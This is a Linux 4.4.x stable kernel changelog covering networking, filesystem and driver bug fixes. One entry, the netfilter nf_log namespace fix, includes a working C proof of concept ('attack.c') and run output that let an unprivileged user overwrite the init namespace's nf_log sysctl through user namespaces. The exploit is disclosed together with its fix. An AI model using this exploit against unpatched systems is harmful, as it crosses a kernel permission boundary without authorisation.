Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Andy Gospodarek
c5bad811ca bgmac: stop clearing DMA receive control register right after it is set
[ Upstream commit fcdefccac976ee51dd6071832b842d8fb41c479c ]

Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today.  I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.

On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.

This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.

Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde1f ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eric Dumazet
6e9ca1b61c net: mangle zero checksum in skb_checksum_help()
[ Upstream commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 ]

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eric Dumazet
ac4c2cf6f5 net: clear sk_err_soft in sk_clone_lock()
[ Upstream commit e551c32d57c88923f99f8f010e89ca7ed0735e83 ]

At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Florian Westphal
74e53a3a05 dctcp: avoid bogus doubling of cwnd after loss
[ Upstream commit ce6dd23329b1ee6a794acf5f7e40f8e89b8317ee ]

If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to

   tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);

... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.

This can cause severe growth of cwnd (eventually overflowing u32).

Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.

Fixes: e3118e8359 ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Greg Kroah-Hartman
86429bd405 Linux 4.4.33 2016-11-18 10:49:03 +01:00
Jann Horn
21cc1a183a netfilter: fix namespace handling in nf_log_proc_dostring
commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:37 +01:00
Goldwyn Rodrigues
ee5dd68788 btrfs: qgroup: Prevent qgroup->reserved from going subzero
commit 0b34c261e235a5c74dcf78bd305845bd15fe2b42 upstream.

While free'ing qgroup->reserved resources, we much check if
the page has not been invalidated by a truncate operation
by checking if the page is still dirty before reducing the
qgroup resources. Resources in such a case are free'd when
the entire extent is released by delayed_ref.

This fixes a double accounting while releasing resources
in case of truncating a file, reproduced by the following testcase.

SCRATCH_DEV=/dev/vdb
SCRATCH_MNT=/mnt
mkfs.btrfs -f $SCRATCH_DEV
mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT
cd $SCRATCH_MNT
btrfs quota enable $SCRATCH_MNT
btrfs subvolume create a
btrfs qgroup limit 500m a $SCRATCH_MNT
sync
for c in {1..15}; do
dd if=/dev/zero  bs=1M count=40 of=$SCRATCH_MNT/a/file;
done

sleep 10
sync
sleep 5

touch $SCRATCH_MNT/a/newfile

echo "Removing file"
rm $SCRATCH_MNT/a/file

Fixes: b9d0b38928 ("btrfs: Add handler for invalidate page")
Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com>
Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:37 +01:00
Fabio Estevam
ae6d4df4a7 mmc: mxs: Initialize the spinlock prior to using it
commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d1 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:37 +01:00
Chen-Yu Tsai
ae5b8dbfe6 ASoC: sun4i-codec: return error code instead of NULL when create_card fails
commit 85915b63ad8b796848f431b66c9ba5e356e722e5 upstream.

When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.

Make the create_card function pass back a meaningful error code, and
assign it to the return value.

Fixes: 45fb6b6f2a ("ASoC: sunxi: add support for the on-chip codec on
		      early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:37 +01:00
Punit Agrawal
125e84726d ACPI / APEI: Fix incorrect return value of ghes_proc()
commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a49113 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:37 +01:00
Huaibin Wang
5cd2cd84d5 i40e: fix call of ndo_dflt_bridge_getlink()
commit 599b076d15ee3ead7af20fc907079df00b2d59a0 upstream.

Order of arguments is wrong.
The wrong code has been introduced by commit 7d4f8d871a, but is compiled
only since commit 9df70b6641.

Note that this may break netlink dumps.

Fixes: 9df70b6641 ("i40e: Remove incorrect #ifdef's")
Fixes: 7d4f8d871a ("switchdev; add VLAN support for port's bridge_getlink")
CC: Carolyn Wyborny <carolyn.wyborny@intel.com>
Signed-off-by: Huaibin Wang <huaibin.wang@6wind.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:36 +01:00
Andrew Lutomirski
5be7e6b48b hwrng: core - Don't use a stack buffer in add_early_randomness()
commit 6d4952d9d9d4dc2bb9c0255d95a09405a1e958f7 upstream.

hw_random carefully avoids using a stack buffer except in
add_early_randomness().  This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.

Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc799647 ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:36 +01:00
Daniel Mentz
ba8580f6cf lib/genalloc.c: start search from start of chunk
commit 62e931fac45b17c2a42549389879411572f75804 upstream.

gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.

The shortcut

	if (size > atomic_read(&chunk->avail))
		continue;

makes the loop skip over chunks that do not have enough bytes left to
fulfill the request.  There are two situations, though, where an
allocation might still fail:

(1) The available memory is not contiguous, i.e.  the request cannot
    be fulfilled due to external fragmentation.

(2) A race condition.  Another thread runs the same code concurrently
    and is quicker to grab the available memory.

In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed.  This return value is then assigned to
start_bit.  The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched.  Today, the code fails to reset start_bit to 0.  As a
result, prefixes of subsequent chunks are ignored.  Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.

Fixes: 7f184275aa ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-18 10:48:36 +01:00